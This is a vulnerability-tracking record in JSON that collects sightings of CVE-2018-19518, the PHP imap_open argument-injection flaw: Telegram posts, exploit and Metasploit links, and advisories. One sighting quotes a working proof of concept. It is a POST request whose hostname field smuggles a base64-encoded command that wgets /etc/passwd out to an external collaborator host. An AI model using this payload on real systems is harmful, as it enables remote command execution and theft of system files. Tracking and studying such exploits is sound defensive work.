{"vulnerability": "cve-2018-19518", "sightings": [{"uuid": "3756a222-ad08-45f4-9aa3-dccc6ad511e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1649", "content": "#exploit\nCVE-2018-19518 (PHP IMAP Vulnerability):\nUniversity of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command without preventing argument injection, which might allow remote malicious users to execute arbitrary OS commands\n\nPoC:\necho \"wget --post-file /etc/passwd burpcollaborator(dot)net\" | base64 \n\nPOST / HTTP/1.1\nHost: Redacted\n\nhostname=x+-oProxyCommand%3echo%09d2dldCAtLXBvc3QtZmlsZSAvZXRjL3Bhc3N3ZCBidXJwY29sbGFib3JhdG9yLm5ldAo|base64%09-d|sh}&username=test&password=222", "creation_timestamp": "2022-12-14T23:09:09.000000Z"}, {"uuid": "651723c8-f11b-4cf1-9826-f97c1265e194", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/php_imap_open_rce.rb", "content": "", "creation_timestamp": "2018-11-27T22:53:35.000000Z"}, {"uuid": "fce819f4-0f51-4377-ab04-0b4ced484cac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2807", "content": "#Analytics\n10 most exploited vulnerabilities of the week (feb 22-28)\nCVE-2021-3156 - Heap-Based Buffer Overflow in Sudo\nhttps://t.me/cybersecuritytechnologies/2577\nCVE-2021-21972 - VMware vCenter RCE\nhttps://swarm.ptsecurity.com/unauth-rce-vmware/#more-2477\nhttps://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC\nhttps://github.com/NS-Sp4ce/CVE-2021-21972\nhttps://github.com/yaunsky/CVE-2021-21972\nCVE-2021-1782 - iOS\\iPadOS 14.3 kernel LPE\nhttps://t.me/cybersecuritytechnologies/2694\nCVE-2021-3177 - Python3 Buffer Overflow\nhttps://t.me/cybersecuritytechnologies/2740\nCVE-2021-21973 - VMware vCenter SSRF\nhttps://mobile.twitter.com/osama_hroot/status/1365586206982082560/photo/1\nCVE-2017-0005 - Windows GDI EoP\nhttps://t.me/cybersecuritytechnologies/443\nCVE-2021-24093 - Win Graph. Component RCE\nhttps://t.me/cybersecuritytechnologies/2806\nCVE-2021-25281/25282 - SaltStack Exploit\nhttps://github.com/Immersive-Labs-Sec/CVE-2021-25281\nCVE-2018-19518 - PHP IMAP Vuln.\nhttps://t.me/cybersecuritytechnologies/1649", "creation_timestamp": "2021-03-01T11:00:27.000000Z"}, {"uuid": "43697854-483e-4876-8975-a5ee6e7228c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "https://t.me/arpsyndicate/4390", "content": "#ExploitObserverAlert\n\nCVE-2018-19518\n\nDESCRIPTION: Exploit Observer has 46 entries in 10 file formats related to CVE-2018-19518. University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a \"-oProxyCommand\" argument.\n\nFIRST-EPSS: 0.969140000\nNVD-IS: 5.9\nNVD-ES: 1.6", "creation_timestamp": "2024-04-09T05:06:56.000000Z"}, {"uuid": "b7a32522-919e-45cf-96cb-ed3bc9ed580e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "exploited", "source": "https://www.exploit-db.com/exploits/45914", "content": "", "creation_timestamp": "2018-11-29T00:00:00.000000Z"}, {"uuid": "0b6ac037-5593-425f-9232-4c62c8536a7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:43.000000Z"}, {"uuid": "93400835-735f-4bbc-9f24-c5c40d198412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:06.000000Z"}, {"uuid": "ec703d60-8c88-40e4-894d-1bb008ad0293", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-02", "content": "", "creation_timestamp": "2026-01-27T11:00:00.000000Z"}]}